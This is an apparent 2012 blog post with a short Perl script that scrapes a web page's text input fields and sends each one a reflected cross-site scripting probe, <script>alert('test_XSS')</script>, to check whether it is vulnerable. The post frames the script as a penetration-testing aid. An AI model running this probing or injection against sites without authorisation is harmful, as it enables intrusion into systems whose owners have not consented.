Discovering Cross Site Scripting (XSS) vulnerabilities

Posted on venerdì 27 gennaio 2012 by Ivano Binetti

Today I wrote a simple perl script to automatically discover XSS vulnerabilities into a web application.
This script can be improved in order to make it more suitable to be used in a web penetration test.

Following the code:


#!/usr/bin/perl 

use strict;
use LWP::Simple;
my ($url, $webpage, @webpage, @name, $result);

if(@ARGV < 1) {
 usage();
}

#Get web page specified by cmd
$webpage = get("http://" . $ARGV[0]);

#Split variable into an arry
@webpage = split(/\n/, $webpage);

#Parsing Web Page to obtain names of "input type=text" 
foreach (@webpage) {
  if($_ =~ /input\stype="text"\sname="(\w{1,30})"/) {
    push(@name, $1);    
  }
}

#Print found search box
if(@name) {
 print "I've found the following search box:\n";  
 foreach (@name) {
   print "$_\n";
 }
 print "and I've discovered that:\n";


#Automatically exploit search box to verify XSS vulnerabilities
 foreach (@name) {
   $result = get("http://" . $ARGV[0] . "?" . $_ . "=<script>alert('test_XSS')</script>");
   if($result =~ /<script>alert\('test_XSS'\)<\/script>/) {
     print "$_ is vulnerable to XSS\n";
   }   
   else { print "$_ isn't vulnerable to XSS\n";}
 }
}

else { 
 print"I have not found search boxes in " . $ARGV[0] . "\n";
}

sub usage() {
 print"Usage: ".$0." <url>\n";
 print "Example: " . $0 . " ivanobinetti.com\n";
 exit;
}